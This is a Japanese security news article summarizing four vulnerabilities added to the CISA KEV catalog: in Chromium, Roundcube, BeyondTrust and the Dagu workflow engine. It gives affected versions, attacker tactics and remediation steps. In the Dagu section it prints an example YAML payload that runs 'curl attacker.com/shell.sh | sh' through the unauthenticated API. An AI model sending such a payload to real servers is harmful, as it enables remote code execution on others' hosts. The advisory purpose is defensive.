技術 約6分で読めます

CISA KEV追加の重大脆弱性4件:Chromiumゼロデイからデフォルト認証なしRCEまで

同じ週にCISA KEVカタログへ重大脆弱性が立て続けに追加された。ブラウザ、Webメール、特権アクセス管理ツール、ワークフローエンジン——対象は異なるが、すべて悪用が確認済みまたはPoCが公開済みで、即時対応が必要な案件だ。

Chromium CVE-2026-2441:CSSエンジンのUAFゼロデイ

概要

CVE-2026-2441はChromiumのCSSエンジンに存在するuse-after-free(UAF)脆弱性だ。CISAがKEVカタログに追加済みで、悪用コードが既に流通している。

UAFはヒープメモリ内で解放済みの領域を再度参照するバグで、攻撃者はユーザーの権限で任意のコードを実行できる。悪意あるHTMLページを開くだけで攻撃が成立する。

影響を受けるブラウザ

ブラウザ対応バージョン
Google Chrome145.0.7632.75/76(Windows/macOS)、144.0.7559.75(Linux)
Microsoft Edgeパッチリリース済み
Braveパッチリリース済み
Operaパッチリリース済み

SafariはWebKit、FirefoxはGeckoを使用しており影響を受けない。

対応

Chromeはchrome://settings/help、Edgeはedge://settings/helpでバージョンを確認する。企業環境では管理対象デバイスへのパッチ配布を最高優先度に設定すること。

ChromiumのレンダリングエンジンBlinkはCSSの複雑な処理をC++で実装しており、カスケード・継承・アニメーションなど動的な状態変化によってオブジェクトのライフタイム管理が複雑になりやすい。CSSエンジンのUAFは過去にも複数のCVEが報告されており、JavaScriptエンジンと並ぶ主要な攻撃面だ。

CISAのKEV追加は「野外での実際の悪用が確認された」ことを意味する。放置すればやられる。


Roundcube CVE-2025-49113:10年以上潜伏していたCVSS 9.9のRCE

概要

項目内容
CVE番号CVE-2025-49113
CVSSスコア9.9(Critical)
脆弱性の種類信頼されないデータのデシリアライゼーション
悪用状況野外での積極的な悪用確認済み

program/actions/settings/upload.php_fromパラメータが適切に検証されておらず、認証済みユーザーがサーバー上で任意のコードを実行できる。

パッチ公開後48時間で武器化

ドバイのセキュリティ企業FearsOffが報告し、2025年6月にパッチが適用された。しかしパッチ公開後48時間以内に攻撃者がエクスプロイトを武器化した。さらに、コードベースに10年以上存在していたことが判明している。48時間で武器化されている以上、パッチ適用の猶予はほぼない。

あわせてCVE-2025-68461(CVSS 7.2、SVGアニメートタグによるXSS)も同日KEVに追加された。2025年12月にパッチ提供済み。

なぜRoundcubeが狙われるか

Roundcubeはオープンソースのwebメールクライアントで、特に欧州の政府機関・外交機関に広く採用されている。過去にAPT28(Fancy Bear/GRU関連)やWinter Vivernが欧州政府機関やシンクタンクを狙うキャンペーンで標的にしてきた。今回KEVに追加された件は攻撃者が特定されていないが、過去の標的化パターンと一致する。

対応チェックリスト

  1. 使用中のRoundcubeバージョンを確認
  2. CVE-2025-49113: 2025年6月リリースのパッチを適用
  3. CVE-2025-68461: 2025年12月リリースのパッチを適用
  4. 認証ログの不審なアップロード操作をチェック
  5. 最新安定版へのアップグレードを優先

CISA KEV追加により、連邦民間行政機関(FCEB)は2026年3月13日までの対応が義務付けられた。

一次情報: CISA KEVカタログ


BeyondTrust CVE-2026-1731:ランサムウェアキャンペーンで悪用中のCVSS 9.9

概要

項目内容
CVE番号CVE-2026-1731
CVSSスコア9.9(Critical)
影響製品BeyondTrust Remote Support(RS)、Privileged Remote Access(PRA)
攻撃経路WebSocketインターフェース
CISAカタログKEV登録済み(ランサムウェア悪用確認)

WebSocketインターフェース経由でthin-scc-wrapperスクリプトを通じて任意のシェルコマンドをインジェクション・実行できる。Palo Alto Networks Unit 42によれば、このアカウントを掌握すればアプライアンスの設定・管理セッション・ネットワークトラフィックを丸ごと制御できる。

観察された攻撃チェーン

Unit 42が確認した多層的な攻撃手口:

  1. カスタムPythonスクリプトで管理者アカウントへのアクセスを取得
  2. ディスク書き込みなしのPHPバックドアを設置(ディスクスキャンでの検出が困難)
  3. Bashドロッパーで持続的Webシェルを確立、VShell・Spark RATをインストール
  4. 設定ファイル・PostgreSQLダンプを圧縮して外部送信

標的セクターは金融、法律、テクノロジー、高等教育、卸売・小売、医療。地域は米国、フランス、ドイツ、オーストラリア、カナダ。BeyondTrustはPAM(特権アクセス管理)の中心的製品であり、侵害された場合の横展開の影響は組織全体に及ぶ。

繰り返す同一製品の脆弱性

BeyondTrustには以前にもCVE-2024-12356が存在し、中国系脅威アクター「Silk Typhoon」による悪用が記録されている。Unit 42は「異なるコード実行経路において入力検証の問題が繰り返し発生している」と指摘している。同じ製品で同じ種類のバグが繰り返されるのは設計の問題だ。

対応手順

  1. BeyondTrustの最新パッチを速やかに適用
  2. WebSocketアクセスログとthin-scc-wrapperの実行履歴を確認
  3. PostgreSQLダンプ操作の痕跡を確認
  4. 不審なPHPファイル・Bashスクリプト、VShell・Spark RATの通信を確認
  5. 不正追加・変更された管理者アカウントがないか監査
  6. CVE-2024-12356の対応状況もあわせて検証

元記事: BeyondTrust Flaw Used for Web Shells, Backdoors, and Data Exfiltration


Dagu GHSA-6QR9-G2XW-CW92:デフォルト認証なしでAPIからRCE(CVSS 9.8)

概要

GoベースのワークフローエンジンDaguにCVSS 9.8の脆弱性が見つかった。デフォルト設定ではAPIエンドポイントに認証が存在せず、外部から任意のシェルコマンドを実行できる。PoCが公開済み。

DaguはGoで書かれた軽量ワークフローエンジンで、cronの代替としてCI/CDパイプラインやデータパイプラインで使われている。

攻撃の仕組み

デフォルト設定では/api/v1/dagsエンドポイントが認証なしで外部に公開される。このエンドポイントはDAG定義(YAMLファイル)を受け取って実行する機能を持つ。攻撃者は以下のようなHTTP POSTを送るだけでホスト上の任意のコマンドを実行できる。

steps:
  - name: malicious-step
    command: /bin/sh
    args:
      - -c
      - "curl attacker.com/shell.sh | sh"

認証機能自体は存在するが、有効化には明示的な設定が必要で、デフォルトでは無効。CWE-306「認証メカニズムの欠落」に該当する。

要素評価
攻撃ベクトルネットワーク経由(ローカルアクセス不要)
攻撃の複雑性低い
必要な認証なし
影響範囲機密性・完全性・可用性すべてに高い影響

対応手順

修正済みバージョンへのアップデートが最優先。修正内容はauthMiddlewareの追加で、APIエンドポイントへの認証チェックが挿入された。アップデート後、APIアクセスが401 Unauthorizedを返せば対応済みだ。

暫定対応として設定ファイルで認証を有効化できる。

# config.yaml
auth:
  mode: builtin
  basic:
    username: your_username
    password: your_password

加えて、DaguのAPIポート(デフォルト8080)をファイアウォールで制限し、Daguを非特権ユーザーで実行して被害範囲を限定する。Kubernetesクラスタや共有開発環境で動作しているDaguは、横移動(ラテラルムーブメント)の足がかりになりうる。

参照: GHSA-6QR9-G2XW-CW92